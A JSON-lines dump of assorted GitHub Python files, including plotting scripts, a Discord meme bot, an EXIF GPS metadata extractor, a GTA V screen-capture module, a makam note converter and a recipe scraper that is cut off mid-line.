+{"seq_id":"5672662393","text":"from wordlist import *\nimport numpy as np\nimport os\nimport sys\nsys.path.append(\"../lm-watermarking/\")\nfrom six.moves import cPickle as pkl\nfrom matplotlib import pyplot as plt\nfrom utils import parse_args\nimport matplotlib\nfrom matplotlib.colors import LogNorm\nimport seaborn as sns\nsns.set_theme()\n\nmatplotlib.rcParams['pdf.fonttype'] = 42\nmatplotlib.rcParams['ps.fonttype'] = 42\nSMALL_SIZE = 15\nMEDIUM_SIZE = 20\nBIGGER_SIZE = 20\n\nplt.rc('font', size=SMALL_SIZE)          # controls default text sizes\nplt.rc('axes', titlesize=SMALL_SIZE)     # fontsize of the axes title\nplt.rc('axes', labelsize=MEDIUM_SIZE)    # fontsize of the x and y labels\nplt.rc('xtick', labelsize=SMALL_SIZE)    # fontsize of the tick labels\nplt.rc('ytick', labelsize=SMALL_SIZE)    # fontsize of the tick labels\nplt.rc('legend', fontsize=12)    # legend fontsize\nplt.rc('figure', titlesize=BIGGER_SIZE)  # fontsize of the figure title\n\nargs = parse_args()\nM = np.load(os.path.join(args.DUMP, \"matrix.npy\"))\n\nW = \"the\"\ni1 = word_to_index[W]\nx = np.stack([index_to_word[i] for i in range(181)])\ny = M[i1]/M[i1].sum()\norder = np.argsort(y)[-50:][::-1]\nx = x[order]\ny = y[order]\n\n# plt.figure(figsize=(12,3), dpi=500)\n# plt.plot(x, y, '-+', markersize=4)\n# plt.xlabel(\"Top 50 words\")\n# plt.ylabel(\"Green list\\nscore\")\n# # plt.title(\"Suffix score for the word '{}'\".format(W))\n# plt.xticks(rotation=90)\n# # plt.yticks(np.round(100*np.linspace(0, y.max(), 5))/100)\n# plt.semilogy()\n# plt.tight_layout()\n# plt.savefig(\"images/{}.png\".format(W))\n\nplt.figure(figsize=(7,6), dpi=500)\nticks = [index_to_word[i] for i in range(20)]\nM = M[:20, :20]\nM1 = np.stack([M[i]/M[i].sum() for i in range(len(M))])\nax = sns.heatmap(M1, linewidth=0.05, xticklabels=ticks, yticklabels=ticks, norm=LogNorm())\nplt.tight_layout()\nplt.savefig(\"images/heat.png\")","repo_name":"vinusankars/Reliability-of-AI-text-detectors","sub_path":"pair-distribution/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":1809,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"47"}
+{"seq_id":"23915362761","text":"import pandas as pd # data analysis, structured tables and their operations\r\nimport numpy as np # numerical and scientific computing\r\nimport matplotlib.pyplot as plt # plotting tool\r\nfrom pathlib import Path # assemble csv files into a type Python can recognize\r\nfrom IPython.display import display\r\nimport toad\r\n\r\npd.set_option('display.max_rows', 500)\r\npd.set_option('display.max_columns', 500)\r\npd.set_option('display.width', 1000)\r\n\r\ndef 
load_date(path): # read the files and load the data\r\n    application = pd.read_csv(Path(path, 'home-credit-default-risk/application_train.csv'))\r\n    bureau = pd.read_csv(Path(path, 'home-credit-default-risk/bureau.csv'))\r\n    bureau_balance = pd.read_csv(Path(path, 'home-credit-default-risk/bureau_balance.csv'))\r\n    credit_card_balance = pd.read_csv(Path(path, 'home-credit-default-risk/credit_card_balance.csv'))\r\n    installments_payments = pd.read_csv(Path(path, 'home-credit-default-risk/installments_payments.csv'))\r\n    POS_CASH_balance = pd.read_csv(Path(path, 'home-credit-default-risk/POS_CASH_balance.csv'))\r\n    previous_application = pd.read_csv(Path(path, 'home-credit-default-risk/previous_application.csv'))\r\n    return application,bureau,bureau_balance,credit_card_balance,installments_payments,POS_CASH_balance,previous_application\r\n\r\ndate_path = \"C:/Users/test/Desktop/评分卡构建/\"\r\napplication_train,bureau,bureau_balance,credit_card_balance,installments_payments,POS_CASH_balance,previous_application = load_date(date_path)\r\n\r\n#application_check = toad.detect(application_train) # check data quality\r\n#display(application_check.head(10))\r\n\r\nprint('top 10 features with high IV') # use IV to judge the discriminative power of the data\r\ndisplay(toad.quality(application_train.drop(\"SK_ID_CURR\", axis=1), \"TARGET\", iv_only=True)[:10])\r\nprint('top 10 features with the lowest IV')\r\ndisplay(toad.quality(application_train.drop(\"SK_ID_CURR\", axis=1), \"TARGET\", iv_only=True)[-10:])\r\n\r\n","repo_name":"user123-lqh/Score-card","sub_path":"homecredit_step2.py","file_name":"homecredit_step2.py","file_ext":"py","file_size_in_byte":1901,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"}
+{"seq_id":"345808720","text":"#!/usr/bin/python\n\n# Add the two packages to the path\nimport sys\nsys.path.append('project1')\nsys.path.append('project2')\n\n# Import the modules from the two packages\nimport mypackage.module1\nimport mypackage.module2\nimport mypackage.module3\n\nif __name__ == '__main__':\n\t# Create some objects from the first package\n\tp1_foo = mypackage.module1.foo.Foo()\n\tp1_bar = mypackage.module1.bar.Bar()\n\tp1_SomeClass = mypackage.module2.SomeClass()\n\n\t# Create some objects from the second package\n\tp2_bar = mypackage.module3.bar.Bar()\n\tp2_baz = mypackage.module3.baz.Baz()\n\n\t# Show that they all work\n\tp1_foo.run_me()\n\tp1_bar.run_me()\n\tp1_SomeClass.run_me()\n\n\tp2_bar.run_me()\n\tp2_baz.run_me()\n","repo_name":"prschmid/namespacepackage-example","sub_path":"runme.py","file_name":"runme.py","file_ext":"py","file_size_in_byte":680,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"}
+{"seq_id":"33380926691","text":"from django.db import models\nimport torch\nfrom torch.utils.data import Dataset\n\nif torch.cuda.is_available():\n    device = torch.device('cuda')\n    print(f\"There are {torch.cuda.device_count()} GPU(s) available.\")\n    print(\"Device name: \", torch.cuda.get_device_name(0))\nelse:\n    device = torch.device('cpu')\n    print(\"There are no GPU(s) available, using the CPU instead.\")\n\n# Create your models here.\n\nclass QADataset(Dataset):\n    def __init__(self, encodings, labels):\n        self.encodings = encodings\n        self.labels = labels\n    \n\n    def __getitem__(self, idx):\n        item = {key: torch.tensor(val[idx]) for key, val in self.encodings.items()}\n        # print(self.labels['input_ids'][idx])\n        # print(torch.tensor(self.labels['input_ids'][idx]))\n        item['labels'] = torch.tensor(self.labels['input_ids'][idx])\n        return item\n    \n    def 
__len__(self):\n        return len(self.labels['input_ids'])\n    \nclass ChatDataset(Dataset):\n    def __init__(self, inputs, targets, tokenizer):\n        self.inputs = inputs.tolist()\n        self.targets = targets.tolist()\n\n        for idx, i in enumerate(self.inputs):\n            try:\n                self.inputs[idx] = \" \" + self.inputs[idx] + \" : \" + self.targets[idx+1] + \" \"\n            except:\n                break\n        \n        # self.inputs = self.inputs[:-1]\n\n        print(self.inputs[0])\n        # print(len(self.inputs))\n\n        self.inputs_encoded = tokenizer(self.inputs, truncation=True, padding=True, max_length=200, return_tensors='pt')\n        self.labels_encoded = tokenizer(self.targets, truncation=True, padding=True, max_length=200, return_tensors='pt')\n        self.input_ids = self.inputs_encoded['input_ids']\n        self.attention_mask = self.inputs_encoded['attention_mask']\n        self.label_input_ids = self.labels_encoded['input_ids']\n        \n\n    def __len__(self):\n        return len(self.inputs)\n    \n    def __getitem__(self, idx):\n        return (self.input_ids[idx], self.attention_mask[idx])","repo_name":"bapvillamil/openai_chat","sub_path":"gpt2_app/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2027,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"}
+{"seq_id":"43032886105","text":"from PyQt5.QtWidgets import QApplication\nfrom autolocke.ui import MainWindow, TipsDialog, TutorialSteps\nfrom autolocke.textCopy import ImageDiscover\nimport sys\nimport time\n\n\n\"\"\"\nMain file for initializing the GUI (ui.py) and therefore the rest of the \nfunctions.\n\nstylesheet:\nwith open('autolocke\style.qss', 'r') as f:\n\n\"\"\"\n\nif __name__ == '__main__':\n    app = QApplication([])\n    with open('autolocke\style.qss', 'r') as f:\n        style = f.read()\n    app.setStyleSheet(style)\n    tutorial1 = TutorialSteps()\n    tutorial1.exec()\n    tips_dialog = TipsDialog()\n    tips_dialog.exec()\n    window = MainWindow()\n    window.show()\n    app.exec_()\n","repo_name":"muabdali/nuzProject","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":649,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"}
+{"seq_id":"26363087999","text":"import os\nfrom io import BytesIO\nimport uuid\nimport regex as re\nimport requests\nfrom PIL import Image, ImageDraw, ImageFont\nimport nekos\n\nimport discord\nfrom discord import File\nfrom discord.ext import commands\n\nfrom application import getMessage, commandLine\n\n\nclass Av(commands.Cog):\n\n    def __init__(self, bot):\n        self.bot = bot\n\n    @commands.command(name='dab',\n                      description='Ereshkigal dabs',\n                      brief='Eresh dabs')\n    async def dab(self, ctx):\n        await ctx.send(file=File('application/media/eresh-dab.png'))\n\n    @commands.command(name='crab',\n                      description='--crab ,',\n                      brief='Crabs')\n    async def crab(self, ctx, *args):\n        # TODO: subtitles instead of drawtext\n        # TODO: line/underlined text\n        msg = ''\n        for i in range(len(args)):\n            msg += args[i]\n            msg += \" \"\n\n        if len(msg.split(\",\")) != 2:\n            await ctx.send(\"Give me 2 messages separated by a comma\")\n            return\n\n        msg1 = re.sub(r'[\W_]+', ' ', msg[:-1].upper().split(\",\")[0])\n        msg2 = re.sub(r'[\W_]+', ' ', msg[:-1].upper().split(\",\")[1])\n\n        if len(msg1) > 40 or len(msg2) > 40:\n            await ctx.send(\"Max message length 40 characters. 
Cutting to size.\")\n\n msg1 = msg1[:40]\n msg2 = msg2[:40]\n\n if len(msg1) == 0 and len(msg2) == 0:\n await ctx.send(\"Give me at least one message containing letters and/or numbers\")\n return\n\n video = \"application/media/crab3.mp4\"\n font = \"application/media/migu2m.ttf\"\n max_f_size = \"64\"\n f_color = \"white\"\n\n max_text_width = 1080\n f_size = min(int(max_f_size), max_text_width // max(len(msg1), len(msg2)))\n\n salt = str(uuid.uuid4()).replace(\"-\", \"\")[:5]\n output = f'{msg1}_{msg2}_{salt}.mp4'\n\n line_args1 = f'drawtext=fontfile={font}:text='\n line_args2 = f':fontcolor={f_color}:fontsize={f_size}:bordercolor=black:borderw=2:x=(w-text_w)/2:y=(h-text_h-text_h)/2'\n\n ffmpeg = ['ffmpeg', '-i', f'{video}', '-vf',\n f'[in]{line_args1}{msg1}{line_args2},{line_args1}{msg2}{line_args2}+{f_size}[out]',\n '-codec:a', 'copy', '-preset', 'veryfast', '-y', f'{output}']\n\n commandLine(ffmpeg)\n\n if os.path.exists(output):\n if os.path.getsize(output) > 1024:\n await ctx.send(file=File(output))\n else:\n await ctx.send(\"Something went wrong\")\n\n os.remove(output)\n else:\n await ctx.send(\"Something went wrong\")\n\n @commands.command(name='neko',\n description='neko',\n brief='neko',\n aliases=['nekos'])\n async def neko(self, ctx, category=None):\n allowed_categories = ['feet', 'yuri', 'trap', 'futanari', 'hololewd', 'lewdkemo', 'solog',\n 'feetg', 'cum', 'erokemo', 'les', 'wallpaper', 'lewdk', 'ngif', 'tickle',\n 'lewd', 'feed', 'gecg', 'eroyuri', 'eron', 'cum_jpg', 'bj', 'nsfw_neko_gif',\n 'solo', 'kemonomimi', 'nsfw_avatar', 'gasm', 'poke', 'anal', 'slap', 'hentai',\n 'avatar', 'erofeet', 'holo', 'keta', 'blowjob', 'pussy', 'tits', 'holoero',\n 'lizard', 'pussy_jpg', 'pwankg', 'classic', 'kuni', 'waifu', 'pat', '8ball',\n 'kiss', 'femdom', 'neko', 'spank', 'cuddle', 'erok', 'fox_girl', 'boobs',\n 'random_hentai_gif', 'hug', 'ero', 'smug', 'goose', 'baka', 'woof']\n\n if not category:\n msg = \"```Categories:\\n\\n\"\n msg += \", \".join(allowed_categories)\n msg += \"```\"\n await ctx.send(msg)\n\n elif category in allowed_categories:\n await ctx.send(nekos.img(category))\n\n else:\n await ctx.send(\"Not a valid category. 
Run `--neko` to see the categories.\")\n\n @neko.error\n async def nekoError(self, ctx, error):\n await ctx.send(f\"Error: {error}\")\n\n @commands.command(name='possufy',\n description='Possufies a video',\n brief='Blame possu',\n aliases=['possu'])\n async def possufy(self, ctx):\n\n def check(m):\n if len(m.attachments) > 0 and m.author == ctx.message.author:\n return m.attachments[0].url.split(\".\")[-1] in ['mp4', 'webm']\n\n await ctx.send(\"Give me a video in the next 20 seconds\")\n\n message = await self.bot.wait_for('message', check=check, timeout=20.0)\n response = requests.get(message.attachments[0].url)\n\n fname = str(uuid.uuid4()).replace(\"-\", \"\")[:10] + \".\" + message.attachments[0].url.split(\".\")[-1]\n output = \"possufied_\" + fname.split(\".\")[0] + \".mp4\"\n\n with open(fname, 'wb') as f:\n f.write(BytesIO(response.content).read())\n\n ffmpeg = [\"ffmpeg\", \"-i\", f\"{fname}\", \"-i\", f\"{fname}\", \"-c:v\", \"libx264\", \"-preset\", \"ultrafast\",\n \"-s\", \"128x96\", \"-filter:v\", \"fps=10\", \"-crf\", \"51\", \"-c:a\", \"libopus\", \"-ac\", \"1\", \"-ar\",\n \"8000\", \"-b:a\", \"1k\", \"-vbr\", \"constrained\", \"-strict\", \"-2\", \"-shortest\", f\"{output}\"]\n\n commandLine(ffmpeg)\n\n if os.path.exists(fname) and os.path.exists(output):\n if os.path.getsize(fname) > 1024:\n await ctx.send(file=File(output))\n else:\n await ctx.send(\"Something went wrong\")\n\n os.remove(fname)\n os.remove(output)\n else:\n await ctx.send(\"Something went wrong\")\n\n @possufy.error\n async def adminError(self, ctx, error):\n if isinstance(error, commands.NotOwner):\n await ctx.send(getMessage(\"notOwner\"))\n\n @commands.command(name='pikachu',\n description='--pikachu row1, row2, row3',\n brief='Surprised Pikachu',\n aliases=['pika'])\n async def pikachu(self, ctx, *args):\n hq = False\n if not args:\n text = \"Käyttäjä: Testaa komentoa ilman tekstiä, Teksti:, Käyttäjä:\"\n else:\n if args[0] in (\"-hq\", \"-h\", \"-high\", \"--hq\", \"--h\", \"--high\"):\n args = args[1:]\n hq = True\n\n text = \" \".join(args)\n\n text_rows = text.replace(\", \", \"\\n\").replace(\",\", \"\\n\").strip().split(\"\\n\")\n text = \"\\n\".join(text_rows).strip()\n\n fontsize = 36\n line_spacing = 3\n # font = ImageFont.truetype(\"application/media/NotoSansCJKjp-Regular.otf\", size=fontsize)\n font = ImageFont.truetype(\"application/media/migu2m.ttf\", size=fontsize)\n\n if hq:\n img = Image.open(\"application/media/pika-hq.png\")\n else:\n img = Image.open(\"application/media/pika.png\")\n\n img = img.copy().convert(\"RGB\")\n img_width, img_height = img.size\n line_max_chars = int(img_width / fontsize * 2) # Japanese characters take up 2\n rows = list()\n current_row = \"\"\n row_len = 0\n pattern = re.compile(r'([0-9]|[A-z]|[\\p{IsHan}\\p{IsBopo}\\p{IsHira}\\p{IsKatakana}]+)', re.UNICODE)\n\n for i, c in enumerate(text):\n\n c_len = 2 if re.search(pattern, c) else 1\n\n if re.search('([ァ-ン゙゚])', c):\n c_len = 1\n\n # Newline\n if c == \"\\n\":\n rows.append(current_row)\n current_row = \"\"\n row_len = 0\n\n # Below max\n elif row_len + c_len < line_max_chars:\n current_row += c\n row_len += c_len\n\n if i == len(text) - 1:\n rows.append(current_row)\n\n # Exact\n elif row_len + c_len == line_max_chars:\n current_row += c\n rows.append(current_row)\n current_row = \"\"\n row_len = 0\n\n # Over\n elif row_len + c_len > line_max_chars:\n rows.append(current_row)\n current_row = c\n row_len = c_len\n\n rows = rows[:20]\n text = \"\\n\".join(rows)\n text_height = fontsize * len(rows) + 
line_spacing * len(rows)\n\n canvas = Image.new(\"RGB\", (img_width, img_height + text_height), color=\"#FFFFFF\")\n canvas.paste(img, (0, text_height))\n\n if text:\n draw = ImageDraw.Draw(canvas)\n draw.multiline_text((0, 0), text, fill=\"black\", font=font, anchor=None, spacing=line_spacing, align=\"left\")\n del draw\n\n arr = BytesIO()\n canvas.save(arr, format='PNG')\n arr.seek(0)\n\n else:\n arr = BytesIO()\n img.save(arr, format='PNG')\n arr.seek(0)\n\n await ctx.send(file=discord.File(arr, filename='pikachu.png'))\n\n\ndef setup(bot):\n bot.add_cog(Av(bot))\n","repo_name":"Vogelchevalier/ereshBot","sub_path":"application/cogs/av.py","file_name":"av.py","file_ext":"py","file_size_in_byte":8994,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"20262571412","text":"li = [{'personName': 'oil', 'personId': '41f3c76d-5bee-418b-8f65-5233b3521789'}, \n {'personName': 'golf', 'personId': '506ec04e-8a43-4e44-9843-2a411ab36146'}, \n {'personName': 'sprite', 'personId': '7f96cced-fe6c-4ed4-8332-33a0c36f6aeb'}, \n {'personName': 'gene', 'personId': 'd30f428e-0a15-4eb5-9f07-d5886dd5a574'}, \n {'personName': 'ice', 'personId': 'f29d819f-8b24-4bb6-bd17-055bc64ed32c'}]\n\nfunctions = [{'describe': 'Open Camera', 'function_name': 'open_camera'},\n {'describe': 'Azure Camera', 'function_name': 'azure_camera'},\n {'describe': 'List Group', 'function_name': 'list_group'},\n {'describe': 'List person', 'function_name': 'list_person'},\n {'describe': 'Create Group', 'function_name': 'create_group'},\n {'describe': 'Create Person Group', 'function_name': 'create_person_group'},\n {'describe': 'Detection', 'function_name': 'detection'},\n {'describe': 'Sync Person', 'function_name': 'sync_person'},\n {'describe': 'Quit', 'function_name': 'quit'}]\n\nprint(li[0])\nprint(li[0]['personName'])\n\ndef open_camera():\n print('open camera')\n\n\ndef azure_camera():\n print('azure_camera')\n\n\nfor i in range(len(functions)):\n print(\"\\t\"+str(i+1)+\". 
\"+str(functions[i]['describe']))\n\n\nselect = input('Select: ')\n\nif str(select).isdigit() and int(select) >= 0 and int(select) <= len(functions):\n locals()[functions[int(select)-1]['function_name']]()\nelse:\n print(\"Please input number in range only\")","repo_name":"wnalina/project-61","sub_path":"test1.py","file_name":"test1.py","file_ext":"py","file_size_in_byte":1530,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"73469909901","text":"import csv\nimport os\nimport exifread\nfrom util.libreria import *\n\nnombre_carpeta = 'files'\ncsv_file_path = 'metadata.csv'\n\n\ndef get_metadata_del_map(nombre_carpeta):\n try:\n contenido = os.listdir(nombre_carpeta)\n metadata_map = {}\n\n '''\n Lee directorio y construye un diccionario con los metadatos de todos los archivos\n '''\n print(f\"leyendo metadatos de los archivos\")\n for archivo in contenido:\n image_path = os.path.join(nombre_carpeta, archivo)\n # if 'A00B64A62873' in archivo:\n metadata = get_archivo_metadata(image_path, archivo)\n metadata_map[archivo] = metadata\n\n return metadata_map\n\n except Exception as e:\n print(f\"😱 Error al crear el mapa de metadatos: {e}\")\n return {}\n\n\ndef get_archivo_metadata(file_path, archivo):\n \"\"\"\n Lee los metadatos de un archivo de imagen.\n\n Args:\n file_path (str): La ruta al archivo de imagen.\n\n Returns:\n dict: Un diccionario con los metadatos del archivo.\n \"\"\"\n try:\n metadata = {}\n\n _, extension = os.path.splitext(file_path)\n\n if extension.lower() in ('.jpg', '.jpeg', '.png', '.gif'):\n with open(file_path, 'rb') as f:\n metadata = exifread.process_file(f)\n\n gps_latitude = metadata.get('GPS GPSLatitude')\n gps_longitude = metadata.get('GPS GPSLongitude')\n gps_latitude_ref = metadata.get('GPS GPSLatitudeRef')\n gps_longitude_ref = metadata.get('GPS GPSLongitudeRef')\n exif_date_time_original = metadata.get('EXIF DateTimeOriginal')\n\n if gps_latitude is not None and gps_longitude is not None and gps_latitude_ref is not None and gps_longitude_ref is not None:\n latitude = convert_to_decimal(gps_latitude)\n longitude = convert_to_decimal(gps_longitude)\n\n if gps_latitude_ref.values == 'S':\n latitude = -latitude\n if gps_longitude_ref.values == 'W':\n longitude = -longitude\n\n return latitude, longitude, exif_date_time_original\n\n elif extension.lower() == '.heic':\n metadata = read_metadata_exiftool(file_path)\n\n gps_latitude = metadata.get('GPSLatitude')\n gps_longitude = metadata.get('GPSLongitude')\n gps_latitude_ref = metadata.get('GPSLatitudeRef')\n gps_longitude_ref = metadata.get('GPSLongitudeRef')\n exif_date_time_original = metadata.get('FileModifyDate')\n\n if gps_latitude is not None and gps_longitude is not None and gps_latitude_ref is not None and gps_longitude_ref is not None:\n latitude = convert_to_decimal_heic(gps_latitude)\n longitude = convert_to_decimal_heic(gps_longitude)\n\n if gps_latitude_ref == 'S':\n latitude = -latitude\n if gps_longitude_ref == 'W':\n longitude = -longitude\n\n return latitude, longitude, exif_date_time_original\n\n return metadata\n except Exception as e:\n print(f\"😱 Error al leer los metadatos del archivo {file_path}: {e}\")\n\n\ndef create_csv_from_map(metadata_map, csv_file_path):\n try:\n with open(csv_file_path, 'w', newline='') as csv_file:\n csv_writer = csv.writer(csv_file)\n csv_writer.writerow(['Archivo', 'Tag', 'Latitud', 'Longitud', 'Fecha']) # Cabecera\n\n print(f\"Escribiendo el csv con los metadatos\")\n for archivo, metadata in 
metadata_map.items():\n if isinstance(metadata, dict):\n gps_latitude = \"No hay parametros en el archivo para latitud\"\n gps_longitude = \"No hay parametros en el archivo para longitud\"\n date = \"No hay parametros en el archivo para fecha\"\n else:\n gps_latitude = metadata[0] if len(metadata) > 0 else \"No hay parametros en el archivo para latitud\"\n gps_longitude = metadata[1] if len(\n metadata) > 1 else \"No hay parametros en el archivo para longitud\"\n date = metadata[2] if len(metadata) > 2 else \"No hay parametros en el archivo para fecha\"\n\n row_data = [archivo, 'GPS Coordinates', gps_latitude, gps_longitude, date]\n csv_writer.writerow(row_data)\n # print(f\"{archivo} Latitud/Longitud: {gps_latitude}, {gps_longitude}, Fecha: {date}\")\n\n except Exception as e:\n print(f\"😱 Error al crear el archivo {archivo} CSV de metadatos {metadata} \"\n f\":ERROR {e}\")\n\n\nmetadata_map = get_metadata_del_map(nombre_carpeta)\ncreate_csv_from_map(metadata_map, csv_file_path)\n\nprint(f\"🚀 Se han escrito los metadatos en el archivo {csv_file_path}\")\n","repo_name":"rommelayala/metadata","sub_path":"metadata_fotos.py","file_name":"metadata_fotos.py","file_ext":"py","file_size_in_byte":4896,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"32808508227","text":"import os\nimport sys\n\nimport win32gui\nimport win32ui\n\nimport cv2\nimport numpy as np\nimport win32con\n\n\nclass Image_Processor:\n\n def __init__(self):\n self.desktop = win32gui.GetDesktopWindow()\n self.gtawin = win32gui.FindWindow(None, \"Grand Theft Auto V\")\n\n\n def grab_screen(self):\n \"\"\"\n grab_screen\n\n Grab game screen in the window named 'winName'\n :param winName: Name of the game window to be captured\n :return: Numpy array\n \"\"\"\n desktop = self.desktop\n\n # get area by a window name\n gtawin = self.gtawin\n # get the bounding box of the window\n x_left, y_up, x_right, y_down = win32gui.GetWindowRect(gtawin)\n # cut window boarders\n \"\"\"\n Note: Windows coordinate system\n (origin)------------> x_right, y_up\n |\n |\n v x_left, y_down\n \"\"\"\n y_up += 32\n x_left += 3\n y_down -= 4\n x_right -= 4\n width = x_right - x_left + 1\n height = y_down - y_up + 1\n\n # the device context(DC) for the entire window (title bar, menus, scroll bars, etc.)\n hwindc = win32gui.GetWindowDC(desktop)\n # Create a DC object from an integer handle\n srcdc = win32ui.CreateDCFromHandle(hwindc)\n # Create a memory device context that is compatible with the source DC\n memdc = srcdc.CreateCompatibleDC()\n # Create a bitmap object\n bmp = win32ui.CreateBitmap()\n # Create a bitmap compatible with the specified device context\n bmp.CreateCompatibleBitmap(srcdc, width, height)\n # Select an object into the device context.\n memdc.SelectObject(bmp)\n # Copy a bitmap from the source device context to this device context\n # parameters: destPos, size, dc, srcPos, rop(the raster operation))\n memdc.BitBlt((0, 0), (width, height), srcdc, (x_left, y_up), win32con.SRCCOPY)\n\n # the bitmap bits\n signedIntsArray = bmp.GetBitmapBits(True)\n # form a 1-D array initialized from text data in a string.\n img = np.fromstring(signedIntsArray, dtype='uint8')\n img.shape = (height, width, 4)\n\n # Delete all resources associated with the device context\n srcdc.DeleteDC()\n memdc.DeleteDC()\n # Releases the device context\n win32gui.ReleaseDC(desktop, hwindc)\n # Delete the bitmap and freeing all system resources associated with the object.\n # After the object is deleted, the 
specified handle is no longer valid.\n win32gui.DeleteObject(bmp.GetHandle())\n\n return cv2.cvtColor(img, cv2.COLOR_RGBA2RGB)\n\n def predict(self, img, knn):\n ret, result, neighbours, dist = knn.findNearest(img, k=1)\n return result\n\n def preprocess(self, img):\n gray = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)\n thr = cv2.adaptiveThreshold(gray, 255, cv2.ADAPTIVE_THRESH_MEAN_C, cv2.THRESH_BINARY, 7, -5)\n return thr\n\n def convert_speed(self, num1, num2, num3):\n hundreds = 1\n tens = 1\n speed = 0\n\n if num3[0][0] != 10:\n hundreds = 10\n tens = 10\n speed += int(num3[0][0])\n if num2[0][0] != 10:\n speed += tens * int(num2[0][0])\n hundreds = tens * 10\n if num1[0][0] != 10:\n speed += hundreds * int(num1[0][0])\n\n return speed\n\n def img_process(self, winName: str = \"Grand Theft Auto V\"):\n screen = self.grab_screen(winName)\n\n numbers = self.preprocess(screen[567:575, 683:702, :])\n\n # three fields for numbers\n num1 = self.predict(numbers[:, :5].reshape(-1, 40).astype(np.float32), self.knnDigits)\n num2 = self.predict(numbers[:, 7:12].reshape(-1, 40).astype(np.float32), self.knnDigits)\n num3 = self.predict(numbers[:, -5:].reshape(-1, 40).astype(np.float32), self.knnDigits)\n\n direct = self.preprocess(screen[561:570, 18:28, :]).reshape(-1, 90).astype(np.float32)\n direct = int(self.predict(direct, self.knnArrows)[0][0])\n\n speed = self.convert_speed(num1, num2, num3)\n resized = cv2.resize(screen, (320, 240))\n\n return screen, resized, speed, direct\n\n\n\n\n","repo_name":"DveloperY0115/GrandTheftAutopilot","sub_path":"Autopilot/core/img_process.py","file_name":"img_process.py","file_ext":"py","file_size_in_byte":4205,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"47"} +{"seq_id":"42174867559","text":"from collections import Counter\n\nnote_line_codes = [\"1\", \"4\", \"7\", \"8\", \"9\",\n \"10\", \"11\", \"12\", \"23\", \"24\", \"28\", \"44\"]\n\npitches = [\"G\", \"A\", \"B\", \"C\", \"D\", \"E\", \"F\"]\nkommas = [9, 9, 4, 9, 9, 4, 9]\n\n\ndef convert_to_sharp(note):\n \"\"\"\n Converts notes with accidental symbols to all sharp rep.'s\n\n G --> G, \n Bb9 --> A, \n Eb4 --> D#5, \n Bb1 --> A#8, \n Bb13 --> G#5, \n Gb5 --> F#4, \n F#4 --> F#4, \n E#4 --> F, \n E#5 --> F#1, \n E#13 --> G\n \"\"\"\n\n if len(note) == 1:\n return note\n\n accidental = note[1]\n if accidental not in [\"#\", \"b\"]:\n raise ValueError(\"Accidental symbol unrecognised!\")\n\n root = note[0]\n idx = pitches.index(root)\n komma = int(note[2:])\n next_root, result = None, None\n remaining_komma = komma\n\n if accidental == \"b\":\n while remaining_komma > 0:\n idx = (idx - 1) % 7\n next_root = pitches[idx]\n remaining_komma -= kommas[idx]\n\n result = next_root\n if remaining_komma < 0:\n result += \"#\" + str(-1 * remaining_komma)\n\n elif accidental == \"#\":\n while remaining_komma > 0:\n remaining_komma -= kommas[idx]\n idx = (idx + 1) % 7\n next_root = pitches[idx]\n\n if remaining_komma < 0:\n idx = (idx - 1) % 7\n next_root = pitches[idx]\n remaining_komma += kommas[idx]\n\n result = next_root\n if remaining_komma != 0:\n result += \"#\" + str(remaining_komma)\n\n return result\n\n\ndef get_notes_as_pitch_classes(file_list, makam=None):\n all_notes = []\n counts = Counter()\n\n for file_path in file_list:\n if makam and makam + \"--\" not in file_path:\n continue\n\n with open(file_path, \"r\") as in_file:\n lines = in_file.readlines()\n notes = []\n for line in lines:\n tokens = line.split(\"\\t\")\n if tokens[1] in note_line_codes:\n note = 
tokens[3]\n if note == \"Es\" or (not note[1].isdigit()):\n continue\n\n pitch_class = convert_to_sharp(note[0] + note[2:])\n notes.append(pitch_class)\n\n all_notes.append(notes)\n counts.update(notes)\n\n return all_notes, counts\n","repo_name":"ihpar/musvec","sub_path":"note_reader.py","file_name":"note_reader.py","file_ext":"py","file_size_in_byte":2329,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"29851001027","text":"import pandas as pd\nimport matplotlib.pyplot as plt\n\n# Ler os dados de um arquivo CSV\ndf = pd.read_csv('dados.csv')\n\n# Criar um gráfico de linha\nplt.plot(df['Data'], df['Valor'])\n\n# Adicionar títulos e rótulos\nplt.title('Dados de exemplo')\nplt.xlabel('Data')\nplt.ylabel('Valor')\n\n# Exibir o gráfico\nplt.show()\n","repo_name":"JuanBindez/CSVGraphc-v1.0-alpha","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":314,"program_lang":"python","lang":"pt","doc_type":"code","stars":2,"dataset":"github-code","pt":"47"} +{"seq_id":"70893409102","text":"from datetime import time\nimport bs4\nimport os # 判斷文件存在\nimport requests\nimport json\nfrom flask import Flask, request, jsonify\n\napp = Flask(__name__, static_folder='../build', static_url_path='/')\n\n@app.route('/')\ndef index():\n return app.send_static_file('index.html')\n\n@app.route('/api/goodfoodcategory')\ndef get_recipes_category():\n url = \"https://www.bbcgoodfood.com/recipes/category/all-healthy\"\n headers = {\n 'Accept': 'application/json',\n 'Content-Type': 'application/json',\n }\n params = {}\n response = requests.get(url, headers=headers, params=params)\n soup = bs4.BeautifulSoup(response.text, \"html.parser\")\n # print(soup)\n recipes_contact = soup.find_all('article', class_='card text-align-left card--with-borders')\n\n data_list=[]\n for recipes_contact_card in recipes_contact:\n recipes_contact_card_img = recipes_contact_card.find('img')['src']\n # print('recipes_contact_card_img = ', recipes_contact_card_img)\n recipes_contact_card_desc = recipes_contact_card.find('p').getText()\n # 